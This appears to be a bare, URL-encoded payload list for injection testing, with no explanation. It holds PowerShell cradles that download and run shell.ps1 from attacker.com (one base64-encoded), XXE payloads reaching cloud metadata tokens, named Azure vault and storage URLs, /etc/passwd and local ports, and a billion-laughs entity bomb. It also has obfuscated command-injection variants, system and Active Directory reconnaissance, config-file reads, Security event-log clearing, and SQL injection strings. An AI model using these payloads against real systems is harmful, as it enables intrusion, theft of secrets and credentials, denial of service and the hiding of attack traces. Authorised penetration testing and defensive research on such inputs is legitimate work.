POWERSHELL%20"IEX(New-Object%20Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2F169.254.169.254%2Fmetadata%2Fidentity%2Foauth2%2Ftoken%3Fapi-version%3D2021-02-01%26resource%3Dhttps%3A%2F%2Fmanagement.azure.com%2F%22%3E%5D%3E%0A%3Croot%3E%26xxe%3B%3C%2Froot%3E
CMD%20/C%20CALC.EXE
POWERSHELL%20"[System.Diagnostics.Process]::Start('CALC.EXE')"
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2F169.254.169.254%2Fmetadata%2Finstance%3Fapi-version%3D2021-02-01%22%3E%5D%3E%0A%3Croot%3E%26xxe%3B%3C%2Froot%3E
POWERSHELL%20"%comspec%%20/c%20CALC.EXE"
CmD%20/c%20CaLc.ExE
POWERSHELL%20"Start-Process%20-FilePath%20CALC.EXE%20-WindowStyle%20Hidden"
POWERSHELL%20"-EncodedCommand%20SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJzBodHRwOi8vYXR0YWNrZXIuY29tL3NoZWxsLnBzMScpAA=="
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2Flocalhost%3A3306%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
POWERSHELL%20"Get-Content%20C:%5Cinetpub%5Cwwwroot%5Cweb.config"
POWERSHELL%20"WHOAMI"
BASH%20-C%20%22WHOAMI%22
POWERSHELL%20"Get-Process"
POWERSHELL%20"IPCONFIG"
POWERSHELL%20"Get-NetIPAddress%20-AddressFamily%20IPv4%20%7C%20Select-Object%20IPAddress"
POWERSHELL%20"[System.Environment]::OSVersion.VersionString"
POWERSHELL%20"Get-ChildItem%20Env:%20%7C%20Select-Object%20Name,%20Value"
POWERSHELL%20"Get-Content%20env:USERNAME"
POWERSHELL%20"[System.Net.Dns]::GetHostName()"
POWERSHELL%20"Test-NetConnection%20-ComputerName%20localhost%20-Port%201433"
POWERSHELL%20"NEW-ITEM%20-PATH%20C:%5CWINDOWS%5CTEMP%5CEXPLOITED.TXT%20-ITEMTYPE%20FILE"
%3C%21DOCTYPE%20lolz%20%5B%3C%21ENTITY%20lol%20%22lol%22%3E%3C%21ENTITY%20lol2%20%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%3C%21ENTITY%20lol3%20%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%3C%21ENTITY%20lol4%20%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%3C%21ENTITY%20lol5%20%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%5D%3E%3Croot%3E%26lol5%3B%3C%2Froot%3E
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22https%3A%2F%2Fkpmg-vault.vault.azure.net%2Fsecrets%2F%3Fapi-version%3D2016-10-01%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22https%3A%2F%2Fkpmgstorage.blob.core.windows.net%2Fcompany-data%2F%3Frestype%3Dcontainer%26comp%3Dlist%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E
POWERSHELL%20"%26%20%27CALC.EXE%27"
POWERSHELL%20".%20%27CALC.EXE%27"
POWERSHELL%20"Invoke-Expression%20-Command%20%27CALC.EXE%27"
cMd%20/C%20CaLc
CMd%20/c%20CalC.EXE
coMd%20/c%20CALc.exe
POWERSHELL%20"[System.Text.Encoding]::ASCII.GetString([byte[]]@(67,65,76,67,46,69,88,69))"
%27%20or%20%271%27%3D%271
%27%20or%201%3D1%20--
%27%20UNION%20SELECT%20username,%20password%20FROM%20Users%20WHERE%20%271%27%3D%271
POWERSHELL%20"Get-ChildItem%20C:%5C%20-Recurse%20-Filter%20%27*.config%27"
POWERSHELL%20"Get-ChildItem%20C:%5C%20-Recurse%20-Filter%20%27*.bak%27"
BASH%20-c%20%22cat%20/etc/passwd%22
BASH%20-c%20%22whoami%22
POWERSHELL%20"Clear-EventLog%20-LogName%20Security"
POWERSHELL%20"Get-ADComputer%20-Filter%20*"
POWERSHELL%20"Get-ADUser%20-Filter%20*"